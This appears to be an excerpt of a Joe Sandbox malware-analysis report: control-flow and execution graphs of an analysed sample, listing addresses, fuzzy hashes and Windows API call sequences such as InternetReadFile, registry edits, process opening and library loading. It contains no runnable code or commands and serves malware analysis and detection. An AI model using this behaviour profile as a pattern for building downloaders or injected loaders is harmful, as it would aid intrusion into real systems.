                                                                                                                                                                                          • Opcode Fuzzy Hash: 44221f7b4e265c41f2935e7b4c25c678cc73ef3de100360b2a151b24d561215f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1821A8B15093009FE750DF28E58871BBBF0BB88314F408E2DF59487290E7BAD5498B87

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 141 401d60-401da6 call 4032d0 145 401eb8-401edd call 401520 141->145 146 401dac-401deb 141->146 149 401ee0-401f15 call 401520 146->149 150 401df1-401e12 call 408588 146->150 156 401e44-401e66 InternetReadFile 150->156 157 401e14 150->157 159 401e20-401e26 156->159 160 401e68-401e6b call 408590 156->160 157->159 161 401f20-401f56 call 401520 157->161 159->160 163 401e28-401e3b call 408568 159->163 168 401e70-401ea5 call 401520 160->168 175 401ea7-401eb1 161->175 170 401e40 163->170 168->175 170->156
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.1530325114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileInternetRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 778332206-0
                                                                                                                                                                                          • Opcode ID: 9890890d3ada3fdc663e57de0812a30eb25d58f5f7f11e7bb14f6e166b179d41
                                                                                                                                                                                          • Instruction ID: ce100b7f68af9c3c426927393a4ba8930437b5a7b302e12c1008fd57649b1a49
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9890890d3ada3fdc663e57de0812a30eb25d58f5f7f11e7bb14f6e166b179d41
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD41B6B55093459FD710AF79D58825FBBE0EB84354F00893EF9C897390E7B9D8848B86

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 178 401e19 179 401e20-401e26 178->179 180 401e68-401e6b call 408590 179->180 181 401e28-401e66 call 408568 InternetReadFile 179->181 185 401e70-401eb1 call 401520 180->185 181->179 181->180
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.1530325114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileInternetRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 778332206-0
                                                                                                                                                                                          • Opcode ID: 191c4dd3e4dc76c539ae9bfc37556f5449baaefb8b79241257ed162d0be5cca0
                                                                                                                                                                                          • Instruction ID: 4a384e665823ba6df6e2ca9bc9e222032fc40d4c4ec5d67989955ef9ae1bad91
                                                                                                                                                                                          • Opcode Fuzzy Hash: 191c4dd3e4dc76c539ae9bfc37556f5449baaefb8b79241257ed162d0be5cca0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D01D3B19083049FD740AF29D98426EBBF0AF84354F00882EF8D897390E7B89484CF87

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:17.8%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:8%
                                                                                                                                                                                          Total number of Nodes:1528
                                                                                                                                                                                          Total number of Limit Nodes:33
                                                                                                                                                                                          execution_graph 4343 402fc0 4344 401446 18 API calls 4343->4344 4345 402fc7 4344->4345 4346 403017 4345->4346 4347 40300a 4345->4347 4350 401a13 4345->4350 4348 406805 18 API calls 4346->4348 4349 401446 18 API calls 4347->4349 4348->4350 4349->4350 4351 4023c1 4352 40145c 18 API calls 4351->4352 4353 4023c8 4352->4353 4356 40726a 4353->4356 4359 406ed2 CreateFileW 4356->4359 4360 406f04 4359->4360 4361 406f1e ReadFile 4359->4361 4362 4062a3 11 API calls 4360->4362 4363 4023d6 4361->4363 4366 406f84 4361->4366 4362->4363 4364 4071e3 CloseHandle 4364->4363 4365 406f9b ReadFile lstrcpynA lstrcmpA 4365->4366 4367 406fe2 SetFilePointer ReadFile 4365->4367 4366->4363 4366->4364 4366->4365 4370 406fdd 4366->4370 4367->4364 4368 4070a8 ReadFile 4367->4368 4369 407138 4368->4369 4369->4368 4369->4370 4371 40715f SetFilePointer GlobalAlloc ReadFile 4369->4371 4370->4364 4372 4071a3 4371->4372 4373 4071bf lstrcpynW GlobalFree 4371->4373 4372->4372 4372->4373 4373->4364 4374 401cc3 4375 40145c 18 API calls 4374->4375 4376 401cca lstrlenW 4375->4376 4377 4030dc 4376->4377 4378 4030e3 4377->4378 4380 405f51 wsprintfW 4377->4380 4380->4378 4395 401c46 4396 40145c 18 API calls 4395->4396 4397 401c4c 4396->4397 4398 4062a3 11 API calls 4397->4398 4399 401c59 4398->4399 4400 406c9b 81 API calls 4399->4400 4401 401c64 4400->4401 4402 403049 4403 401446 18 API calls 4402->4403 4406 403050 4403->4406 4404 406805 18 API calls 4405 401a13 4404->4405 4406->4404 4406->4405 4407 40204a 4408 401446 18 API calls 4407->4408 4409 402051 IsWindow 4408->4409 4410 4018d3 4409->4410 4411 40324c 4412 403277 4411->4412 4413 40325e SetTimer 4411->4413 4414 4032cc 4412->4414 4415 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4412->4415 4413->4412 4415->4414 4416 4048cc 4417 4048f1 4416->4417 4418 4048da 4416->4418 4420 4048ff IsWindowVisible 4417->4420 4424 404916 4417->4424 4419 4048e0 4418->4419 4434 40495a 4418->4434 4421 403daf SendMessageW 4419->4421 4423 40490c 4420->4423 4420->4434 4425 4048ea 4421->4425 4422 404960 CallWindowProcW 4422->4425 4435 40484e SendMessageW 4423->4435 4424->4422 4440 406009 lstrcpynW 4424->4440 4428 404945 4441 405f51 wsprintfW 4428->4441 4430 40494c 4431 40141d 80 API calls 4430->4431 4432 404953 4431->4432 4442 406009 lstrcpynW 4432->4442 4434->4422 4436 404871 GetMessagePos ScreenToClient SendMessageW 4435->4436 4437 4048ab SendMessageW 4435->4437 4438 4048a3 4436->4438 4439 4048a8 4436->4439 4437->4438 4438->4424 4439->4437 4440->4428 4441->4430 4442->4434 4443 4022cc 4444 40145c 18 API calls 4443->4444 4445 4022d3 4444->4445 4446 4062d5 2 API calls 4445->4446 4447 4022d9 4446->4447 4448 4022e8 4447->4448 4452 405f51 wsprintfW 4447->4452 4451 4030e3 4448->4451 4453 405f51 wsprintfW 4448->4453 4452->4448 4453->4451 4223 4050cd 4224 405295 4223->4224 4225 4050ee GetDlgItem GetDlgItem GetDlgItem 4223->4225 4226 4052c6 4224->4226 4227 40529e GetDlgItem CreateThread CloseHandle 4224->4227 4272 403d98 SendMessageW 4225->4272 4229 4052f4 4226->4229 4231 4052e0 ShowWindow ShowWindow 4226->4231 4232 405316 4226->4232 4227->4226 4275 405047 83 API calls 4227->4275 4233 405352 4229->4233 4235 405305 4229->4235 4236 40532b ShowWindow 4229->4236 4230 405162 4243 406805 18 API calls 4230->4243 4274 403d98 SendMessageW 4231->4274 4237 403dca 8 API calls 4232->4237 4233->4232 4238 40535d SendMessageW 4233->4238 4239 403d18 SendMessageW 4235->4239 4241 40534b 4236->4241 4242 40533d 4236->4242 4240 40528e 4237->4240 4238->4240 4245 405376 CreatePopupMenu 4238->4245 4239->4232 4244 403d18 SendMessageW 4241->4244 4246 404f72 25 API calls 4242->4246 4247 405181 4243->4247 4244->4233 4248 406805 18 API calls 4245->4248 4246->4241 4249 4062a3 11 API calls 4247->4249 4251 405386 AppendMenuW 4248->4251 4250 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4249->4250 4252 4051f3 4250->4252 4253 4051d7 SendMessageW SendMessageW 4250->4253 4254 405399 GetWindowRect 4251->4254 4255 4053ac 4251->4255 4256 405206 4252->4256 4257 4051f8 SendMessageW 4252->4257 4253->4252 4258 4053b3 TrackPopupMenu 4254->4258 4255->4258 4259 403d3f 19 API calls 4256->4259 4257->4256 4258->4240 4260 4053d1 4258->4260 4261 405216 4259->4261 4262 4053ed SendMessageW 4260->4262 4263 405253 GetDlgItem SendMessageW 4261->4263 4264 40521f ShowWindow 4261->4264 4262->4262 4265 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4262->4265 4263->4240 4268 405276 SendMessageW SendMessageW 4263->4268 4266 405242 4264->4266 4267 405235 ShowWindow 4264->4267 4269 40542f SendMessageW 4265->4269 4273 403d98 SendMessageW 4266->4273 4267->4266 4268->4240 4269->4269 4270 40545a GlobalUnlock SetClipboardData CloseClipboard 4269->4270 4270->4240 4272->4230 4273->4263 4274->4229 4454 4030cf 4455 40145c 18 API calls 4454->4455 4456 4030d6 4455->4456 4458 4030dc 4456->4458 4461 4063ac GlobalAlloc lstrlenW 4456->4461 4459 4030e3 4458->4459 4488 405f51 wsprintfW 4458->4488 4462 4063e2 4461->4462 4463 406434 4461->4463 4464 40640f GetVersionExW 4462->4464 4489 40602b CharUpperW 4462->4489 4463->4458 4464->4463 4465 40643e 4464->4465 4466 406464 LoadLibraryA 4465->4466 4467 40644d 4465->4467 4466->4463 4470 406482 GetProcAddress GetProcAddress GetProcAddress 4466->4470 4467->4463 4469 406585 GlobalFree 4467->4469 4471 40659b LoadLibraryA 4469->4471 4472 4066dd FreeLibrary 4469->4472 4475 4064aa 4470->4475 4478 4065f5 4470->4478 4471->4463 4474 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4471->4474 4472->4463 4473 406651 FreeLibrary 4482 40662a 4473->4482 4474->4478 4476 4064ce FreeLibrary GlobalFree 4475->4476 4475->4478 4484 4064ea 4475->4484 4476->4463 4477 4066ea 4480 4066ef CloseHandle FreeLibrary 4477->4480 4478->4473 4478->4482 4479 4064fc lstrcpyW OpenProcess 4481 40654f CloseHandle CharUpperW lstrcmpW 4479->4481 4479->4484 4483 406704 CloseHandle 4480->4483 4481->4478 4481->4484 4482->4477 4485 406685 lstrcmpW 4482->4485 4486 4066b6 CloseHandle 4482->4486 4487 4066d4 CloseHandle 4482->4487 4483->4480 4484->4469 4484->4479 4484->4481 4485->4482 4485->4483 4486->4482 4487->4472 4488->4459 4489->4462 4490 407752 4494 407344 4490->4494 4491 407c6d 4492 4073c2 GlobalFree 4493 4073cb GlobalAlloc 4492->4493 4493->4491 4493->4494 4494->4491 4494->4492 4494->4493 4494->4494 4495 407443 GlobalAlloc 4494->4495 4496 40743a GlobalFree 4494->4496 4495->4491 4495->4494 4496->4495 4497 401dd3 4498 401446 18 API calls 4497->4498 4499 401dda 4498->4499 4500 401446 18 API calls 4499->4500 4501 4018d3 4500->4501 4509 402e55 4510 40145c 18 API calls 4509->4510 4511 402e63 4510->4511 4512 402e79 4511->4512 4513 40145c 18 API calls 4511->4513 4514 405e30 2 API calls 4512->4514 4513->4512 4515 402e7f 4514->4515 4539 405e50 GetFileAttributesW CreateFileW 4515->4539 4517 402e8c 4518 402f35 4517->4518 4519 402e98 GlobalAlloc 4517->4519 4522 4062a3 11 API calls 4518->4522 4520 402eb1 4519->4520 4521 402f2c CloseHandle 4519->4521 4540 403368 SetFilePointer 4520->4540 4521->4518 4524 402f45 4522->4524 4526 402f50 DeleteFileW 4524->4526 4527 402f63 4524->4527 4525 402eb7 4529 403336 ReadFile 4525->4529 4526->4527 4541 401435 4527->4541 4530 402ec0 GlobalAlloc 4529->4530 4531 402ed0 4530->4531 4532 402f04 WriteFile GlobalFree 4530->4532 4533 40337f 37 API calls 4531->4533 4534 40337f 37 API calls 4532->4534 4538 402edd 4533->4538 4535 402f29 4534->4535 4535->4521 4537 402efb GlobalFree 4537->4532 4538->4537 4539->4517 4540->4525 4542 404f72 25 API calls 4541->4542 4543 401443 4542->4543 4544 401cd5 4545 401446 18 API calls 4544->4545 4546 401cdd 4545->4546 4547 401446 18 API calls 4546->4547 4548 401ce8 4547->4548 4549 40145c 18 API calls 4548->4549 4550 401cf1 4549->4550 4551 401d07 lstrlenW 4550->4551 4552 401d43 4550->4552 4553 401d11 4551->4553 4553->4552 4557 406009 lstrcpynW 4553->4557 4555 401d2c 4555->4552 4556 401d39 lstrlenW 4555->4556 4556->4552 4557->4555 4558 403cd6 4559 403ce1 4558->4559 4560 403ce5 4559->4560 4561 403ce8 GlobalAlloc 4559->4561 4561->4560 4562 402cd7 4563 401446 18 API calls 4562->4563 4566 402c64 4563->4566 4564 402d99 4565 402d17 ReadFile 4565->4566 4566->4562 4566->4564 4566->4565 4567 402dd8 4568 402ddf 4567->4568 4569 4030e3 4567->4569 4570 402de5 FindClose 4568->4570 4570->4569 4571 401d5c 4572 40145c 18 API calls 4571->4572 4573 401d63 4572->4573 4574 40145c 18 API calls 4573->4574 4575 401d6c 4574->4575 4576 401d73 lstrcmpiW 4575->4576 4577 401d86 lstrcmpW 4575->4577 4578 401d79 4576->4578 4577->4578 4579 401c99 4577->4579 4578->4577 4578->4579 4281 407c5f 4282 407344 4281->4282 4283 4073c2 GlobalFree 4282->4283 4284 4073cb GlobalAlloc 4282->4284 4285 407c6d 4282->4285 4286 407443 GlobalAlloc 4282->4286 4287 40743a GlobalFree 4282->4287 4283->4284 4284->4282 4284->4285 4286->4282 4286->4285 4287->4286 4580 404363 4581 404373 4580->4581 4582 40439c 4580->4582 4584 403d3f 19 API calls 4581->4584 4583 403dca 8 API calls 4582->4583 4585 4043a8 4583->4585 4586 404380 SetDlgItemTextW 4584->4586 4586->4582 4587 4027e3 4588 4027e9 4587->4588 4589 4027f2 4588->4589 4590 402836 4588->4590 4603 401553 4589->4603 4591 40145c 18 API calls 4590->4591 4593 40283d 4591->4593 4595 4062a3 11 API calls 4593->4595 4594 4027f9 4596 40145c 18 API calls 4594->4596 4601 401a13 4594->4601 4597 40284d 4595->4597 4598 40280a RegDeleteValueW 4596->4598 4607 40149d RegOpenKeyExW 4597->4607 4599 4062a3 11 API calls 4598->4599 4602 40282a RegCloseKey 4599->4602 4602->4601 4604 401563 4603->4604 4605 40145c 18 API calls 4604->4605 4606 401589 RegOpenKeyExW 4605->4606 4606->4594 4613 401515 4607->4613 4615 4014c9 4607->4615 4608 4014ef RegEnumKeyW 4609 401501 RegCloseKey 4608->4609 4608->4615 4610 4062fc 3 API calls 4609->4610 4612 401511 4610->4612 4611 401526 RegCloseKey 4611->4613 4612->4613 4616 401541 RegDeleteKeyW 4612->4616 4613->4601 4614 40149d 3 API calls 4614->4615 4615->4608 4615->4609 4615->4611 4615->4614 4616->4613 4617 403f64 4618 403f90 4617->4618 4619 403f74 4617->4619 4621 403fc3 4618->4621 4622 403f96 SHGetPathFromIDListW 4618->4622 4628 405c84 GetDlgItemTextW 4619->4628 4624 403fad SendMessageW 4622->4624 4625 403fa6 4622->4625 4623 403f81 SendMessageW 4623->4618 4624->4621 4626 40141d 80 API calls 4625->4626 4626->4624 4628->4623 4629 402ae4 4630 402aeb 4629->4630 4631 4030e3 4629->4631 4632 402af2 CloseHandle 4630->4632 4632->4631 4633 402065 4634 401446 18 API calls 4633->4634 4635 40206d 4634->4635 4636 401446 18 API calls 4635->4636 4637 402076 GetDlgItem 4636->4637 4638 4030dc 4637->4638 4639 4030e3 4638->4639 4641 405f51 wsprintfW 4638->4641 4641->4639 4642 402665 4643 40145c 18 API calls 4642->4643 4644 40266b 4643->4644 4645 40145c 18 API calls 4644->4645 4646 402674 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40267d 4647->4648 4649 4062a3 11 API calls 4648->4649 4650 40268c 4649->4650 4651 4062d5 2 API calls 4650->4651 4652 402695 4651->4652 4653 4026a6 lstrlenW lstrlenW 4652->4653 4654 404f72 25 API calls 4652->4654 4657 4030e3 4652->4657 4655 404f72 25 API calls 4653->4655 4654->4652 4656 4026e8 SHFileOperationW 4655->4656 4656->4652 4656->4657 4665 401c69 4666 40145c 18 API calls 4665->4666 4667 401c70 4666->4667 4668 4062a3 11 API calls 4667->4668 4669 401c80 4668->4669 4670 405ca0 MessageBoxIndirectW 4669->4670 4671 401a13 4670->4671 4679 402f6e 4680 402f72 4679->4680 4681 402fae 4679->4681 4682 4062a3 11 API calls 4680->4682 4683 40145c 18 API calls 4681->4683 4684 402f7d 4682->4684 4689 402f9d 4683->4689 4685 4062a3 11 API calls 4684->4685 4686 402f90 4685->4686 4687 402fa2 4686->4687 4688 402f98 4686->4688 4691 4060e7 9 API calls 4687->4691 4690 403e74 5 API calls 4688->4690 4690->4689 4691->4689 4692 4023f0 4693 402403 4692->4693 4694 4024da 4692->4694 4695 40145c 18 API calls 4693->4695 4696 404f72 25 API calls 4694->4696 4697 40240a 4695->4697 4702 4024f1 4696->4702 4698 40145c 18 API calls 4697->4698 4699 402413 4698->4699 4700 402429 LoadLibraryExW 4699->4700 4701 40241b GetModuleHandleW 4699->4701 4703 40243e 4700->4703 4704 4024ce 4700->4704 4701->4700 4701->4703 4716 406365 GlobalAlloc WideCharToMultiByte 4703->4716 4705 404f72 25 API calls 4704->4705 4705->4694 4707 402449 4708 40248c 4707->4708 4709 40244f 4707->4709 4710 404f72 25 API calls 4708->4710 4712 401435 25 API calls 4709->4712 4714 40245f 4709->4714 4711 402496 4710->4711 4713 4062a3 11 API calls 4711->4713 4712->4714 4713->4714 4714->4702 4715 4024c0 FreeLibrary 4714->4715 4715->4702 4717 406390 GetProcAddress 4716->4717 4718 40639d GlobalFree 4716->4718 4717->4718 4718->4707 4719 402df3 4720 402dfa 4719->4720 4722 4019ec 4719->4722 4721 402e07 FindNextFileW 4720->4721 4721->4722 4723 402e16 4721->4723 4725 406009 lstrcpynW 4723->4725 4725->4722 4078 402175 4079 401446 18 API calls 4078->4079 4080 40217c 4079->4080 4081 401446 18 API calls 4080->4081 4082 402186 4081->4082 4083 4062a3 11 API calls 4082->4083 4087 402197 4082->4087 4083->4087 4084 4021aa EnableWindow 4086 4030e3 4084->4086 4085 40219f ShowWindow 4085->4086 4087->4084 4087->4085 4733 404077 4734 404081 4733->4734 4735 404084 lstrcpynW lstrlenW 4733->4735 4734->4735 4104 405479 4105 405491 4104->4105 4106 4055cd 4104->4106 4105->4106 4107 40549d 4105->4107 4108 40561e 4106->4108 4109 4055de GetDlgItem GetDlgItem 4106->4109 4110 4054a8 SetWindowPos 4107->4110 4111 4054bb 4107->4111 4113 405678 4108->4113 4121 40139d 80 API calls 4108->4121 4174 403d3f 4109->4174 4110->4111 4115 4054c0 ShowWindow 4111->4115 4116 4054d8 4111->4116 4114 403daf SendMessageW 4113->4114 4134 4055c8 4113->4134 4144 40568a 4114->4144 4115->4116 4118 4054e0 DestroyWindow 4116->4118 4119 4054fa 4116->4119 4117 405608 KiUserCallbackDispatcher 4120 40141d 80 API calls 4117->4120 4173 4058dc 4118->4173 4122 405510 4119->4122 4123 4054ff SetWindowLongW 4119->4123 4120->4108 4124 405650 4121->4124 4127 4055b9 4122->4127 4128 40551c GetDlgItem 4122->4128 4123->4134 4124->4113 4129 405654 SendMessageW 4124->4129 4125 40141d 80 API calls 4125->4144 4126 4058de DestroyWindow KiUserCallbackDispatcher 4126->4173 4183 403dca 4127->4183 4132 40554c 4128->4132 4133 40552f SendMessageW IsWindowEnabled 4128->4133 4129->4134 4131 40590d ShowWindow 4131->4134 4136 405559 4132->4136 4137 4055a0 SendMessageW 4132->4137 4138 40556c 4132->4138 4147 405551 4132->4147 4133->4132 4133->4134 4135 406805 18 API calls 4135->4144 4136->4137 4136->4147 4137->4127 4141 405574 4138->4141 4142 405589 4138->4142 4140 403d3f 19 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4146 40141d 80 API calls 4142->4146 4143 405587 4143->4127 4144->4125 4144->4126 4144->4134 4144->4135 4144->4140 4149 403d3f 19 API calls 4144->4149 4164 40581e DestroyWindow 4144->4164 4145->4147 4148 405590 4146->4148 4180 403d18 4147->4180 4148->4127 4148->4147 4150 405705 GetDlgItem 4149->4150 4151 405723 ShowWindow KiUserCallbackDispatcher 4150->4151 4152 40571a 4150->4152 4177 403d85 KiUserCallbackDispatcher 4151->4177 4152->4151 4154 40574d EnableWindow 4157 405761 4154->4157 4155 405766 GetSystemMenu EnableMenuItem SendMessageW 4156 405796 SendMessageW 4155->4156 4155->4157 4156->4157 4157->4155 4178 403d98 SendMessageW 4157->4178 4179 406009 lstrcpynW 4157->4179 4160 4057c4 lstrlenW 4161 406805 18 API calls 4160->4161 4162 4057da SetWindowTextW 4161->4162 4163 40139d 80 API calls 4162->4163 4163->4144 4165 405838 CreateDialogParamW 4164->4165 4164->4173 4166 40586b 4165->4166 4165->4173 4167 403d3f 19 API calls 4166->4167 4168 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4167->4168 4169 40139d 80 API calls 4168->4169 4170 4058bc 4169->4170 4170->4134 4171 4058c4 ShowWindow 4170->4171 4172 403daf SendMessageW 4171->4172 4172->4173 4173->4131 4173->4134 4175 406805 18 API calls 4174->4175 4176 403d4a SetDlgItemTextW 4175->4176 4176->4117 4177->4154 4178->4157 4179->4160 4181 403d25 SendMessageW 4180->4181 4182 403d1f 4180->4182 4181->4143 4182->4181 4184 403ddf GetWindowLongW 4183->4184 4194 403e68 4183->4194 4185 403df0 4184->4185 4184->4194 4186 403e02 4185->4186 4187 403dff GetSysColor 4185->4187 4188 403e12 SetBkMode 4186->4188 4189 403e08 SetTextColor 4186->4189 4187->4186 4190 403e30 4188->4190 4191 403e2a GetSysColor 4188->4191 4189->4188 4192 403e41 4190->4192 4193 403e37 SetBkColor 4190->4193 4191->4190 4192->4194 4195 403e54 DeleteObject 4192->4195 4196 403e5b CreateBrushIndirect 4192->4196 4193->4192 4194->4134 4195->4196 4196->4194 4736 4020f9 GetDC GetDeviceCaps 4737 401446 18 API calls 4736->4737 4738 402116 MulDiv 4737->4738 4739 401446 18 API calls 4738->4739 4740 40212c 4739->4740 4741 406805 18 API calls 4740->4741 4742 402165 CreateFontIndirectW 4741->4742 4743 4030dc 4742->4743 4744 4030e3 4743->4744 4746 405f51 wsprintfW 4743->4746 4746->4744 4747 4024fb 4748 40145c 18 API calls 4747->4748 4749 402502 4748->4749 4750 40145c 18 API calls 4749->4750 4751 40250c 4750->4751 4752 40145c 18 API calls 4751->4752 4753 402515 4752->4753 4754 40145c 18 API calls 4753->4754 4755 40251f 4754->4755 4756 40145c 18 API calls 4755->4756 4757 402529 4756->4757 4758 40253d 4757->4758 4759 40145c 18 API calls 4757->4759 4760 4062a3 11 API calls 4758->4760 4759->4758 4761 40256a CoCreateInstance 4760->4761 4762 40258c 4761->4762 4763 40497c GetDlgItem GetDlgItem 4764 4049d2 7 API calls 4763->4764 4769 404bea 4763->4769 4765 404a76 DeleteObject 4764->4765 4766 404a6a SendMessageW 4764->4766 4767 404a81 4765->4767 4766->4765 4770 404ab8 4767->4770 4772 406805 18 API calls 4767->4772 4768 404ccf 4771 404d74 4768->4771 4776 404bdd 4768->4776 4781 404d1e SendMessageW 4768->4781 4769->4768 4779 40484e 5 API calls 4769->4779 4792 404c5a 4769->4792 4775 403d3f 19 API calls 4770->4775 4773 404d89 4771->4773 4774 404d7d SendMessageW 4771->4774 4778 404a9a SendMessageW SendMessageW 4772->4778 4783 404da2 4773->4783 4784 404d9b ImageList_Destroy 4773->4784 4794 404db2 4773->4794 4774->4773 4780 404acc 4775->4780 4782 403dca 8 API calls 4776->4782 4777 404cc1 SendMessageW 4777->4768 4778->4767 4779->4792 4785 403d3f 19 API calls 4780->4785 4781->4776 4787 404d33 SendMessageW 4781->4787 4788 404f6b 4782->4788 4789 404dab GlobalFree 4783->4789 4783->4794 4784->4783 4790 404add 4785->4790 4786 404f1c 4786->4776 4795 404f31 ShowWindow GetDlgItem ShowWindow 4786->4795 4791 404d46 4787->4791 4789->4794 4793 404baa GetWindowLongW SetWindowLongW 4790->4793 4802 404ba4 4790->4802 4805 404b39 SendMessageW 4790->4805 4806 404b67 SendMessageW 4790->4806 4807 404b7b SendMessageW 4790->4807 4801 404d57 SendMessageW 4791->4801 4792->4768 4792->4777 4796 404bc4 4793->4796 4794->4786 4797 404de4 4794->4797 4800 40141d 80 API calls 4794->4800 4795->4776 4798 404be2 4796->4798 4799 404bca ShowWindow 4796->4799 4810 404e12 SendMessageW 4797->4810 4813 404e28 4797->4813 4815 403d98 SendMessageW 4798->4815 4814 403d98 SendMessageW 4799->4814 4800->4797 4801->4771 4802->4793 4802->4796 4805->4790 4806->4790 4807->4790 4808 404ef3 InvalidateRect 4808->4786 4809 404f09 4808->4809 4816 4043ad 4809->4816 4810->4813 4812 404ea1 SendMessageW SendMessageW 4812->4813 4813->4808 4813->4812 4814->4776 4815->4769 4817 4043cd 4816->4817 4818 406805 18 API calls 4817->4818 4819 40440d 4818->4819 4820 406805 18 API calls 4819->4820 4821 404418 4820->4821 4822 406805 18 API calls 4821->4822 4823 404428 lstrlenW wsprintfW SetDlgItemTextW 4822->4823 4823->4786 4824 4026fc 4825 401ee4 4824->4825 4827 402708 4824->4827 4825->4824 4826 406805 18 API calls 4825->4826 4826->4825 4276 4019fd 4277 40145c 18 API calls 4276->4277 4278 401a04 4277->4278 4279 405e7f 2 API calls 4278->4279 4280 401a0b 4279->4280 4828 4022fd 4829 40145c 18 API calls 4828->4829 4830 402304 GetFileVersionInfoSizeW 4829->4830 4831 40232b GlobalAlloc 4830->4831 4835 4030e3 4830->4835 4832 40233f GetFileVersionInfoW 4831->4832 4831->4835 4833 402350 VerQueryValueW 4832->4833 4834 402381 GlobalFree 4832->4834 4833->4834 4837 402369 4833->4837 4834->4835 4841 405f51 wsprintfW 4837->4841 4839 402375 4842 405f51 wsprintfW 4839->4842 4841->4839 4842->4834 4843 402afd 4844 40145c 18 API calls 4843->4844 4845 402b04 4844->4845 4850 405e50 GetFileAttributesW CreateFileW 4845->4850 4847 402b10 4848 4030e3 4847->4848 4851 405f51 wsprintfW 4847->4851 4850->4847 4851->4848 4852 4029ff 4853 401553 19 API calls 4852->4853 4854 402a09 4853->4854 4855 40145c 18 API calls 4854->4855 4856 402a12 4855->4856 4857 402a1f RegQueryValueExW 4856->4857 4859 401a13 4856->4859 4858 402a3f 4857->4858 4862 402a45 4857->4862 4858->4862 4863 405f51 wsprintfW 4858->4863 4861 4029e4 RegCloseKey 4861->4859 4862->4859 4862->4861 4863->4862 4864 401000 4865 401037 BeginPaint GetClientRect 4864->4865 4866 40100c DefWindowProcW 4864->4866 4868 4010fc 4865->4868 4869 401182 4866->4869 4870 401073 CreateBrushIndirect FillRect DeleteObject 4868->4870 4871 401105 4868->4871 4870->4868 4872 401170 EndPaint 4871->4872 4873 40110b CreateFontIndirectW 4871->4873 4872->4869 4873->4872 4874 40111b 6 API calls 4873->4874 4874->4872 4875 401f80 4876 401446 18 API calls 4875->4876 4877 401f88 4876->4877 4878 401446 18 API calls 4877->4878 4879 401f93 4878->4879 4880 401fa3 4879->4880 4881 40145c 18 API calls 4879->4881 4882 401fb3 4880->4882 4883 40145c 18 API calls 4880->4883 4881->4880 4884 402006 4882->4884 4885 401fbc 4882->4885 4883->4882 4887 40145c 18 API calls 4884->4887 4886 401446 18 API calls 4885->4886 4889 401fc4 4886->4889 4888 40200d 4887->4888 4890 40145c 18 API calls 4888->4890 4891 401446 18 API calls 4889->4891 4892 402016 FindWindowExW 4890->4892 4893 401fce 4891->4893 4897 402036 4892->4897 4894 401ff6 SendMessageW 4893->4894 4895 401fd8 SendMessageTimeoutW 4893->4895 4894->4897 4895->4897 4896 4030e3 4897->4896 4899 405f51 wsprintfW 4897->4899 4899->4896 4900 402880 4901 402884 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028a7 4902->4903 4904 40145c 18 API calls 4903->4904 4905 4028b1 4904->4905 4906 4028ba RegCreateKeyExW 4905->4906 4907 4028e8 4906->4907 4914 4029ef 4906->4914 4908 402934 4907->4908 4909 40145c 18 API calls 4907->4909 4910 402963 4908->4910 4913 401446 18 API calls 4908->4913 4912 4028fc lstrlenW 4909->4912 4911 4029ae RegSetValueExW 4910->4911 4915 40337f 37 API calls 4910->4915 4918 4029c6 RegCloseKey 4911->4918 4919 4029cb 4911->4919 4916 402918 4912->4916 4917 40292a 4912->4917 4920 402947 4913->4920 4921 40297b 4915->4921 4922 4062a3 11 API calls 4916->4922 4923 4062a3 11 API calls 4917->4923 4918->4914 4924 4062a3 11 API calls 4919->4924 4925 4062a3 11 API calls 4920->4925 4931 406224 4921->4931 4927 402922 4922->4927 4923->4908 4924->4918 4925->4910 4927->4911 4930 4062a3 11 API calls 4930->4927 4932 406247 4931->4932 4933 40628a 4932->4933 4934 40625c wsprintfW 4932->4934 4935 402991 4933->4935 4936 406293 lstrcatW 4933->4936 4934->4933 4934->4934 4935->4930 4936->4935 4937 402082 4938 401446 18 API calls 4937->4938 4939 402093 SetWindowLongW 4938->4939 4940 4030e3 4939->4940 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 